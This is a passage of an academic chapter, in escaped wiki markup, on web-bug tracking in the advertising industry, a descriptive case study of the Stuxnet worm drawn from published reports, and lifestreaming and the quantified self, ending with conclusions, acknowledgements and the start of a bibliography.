*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book which represents a neuronal frontal portait of an individual, for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
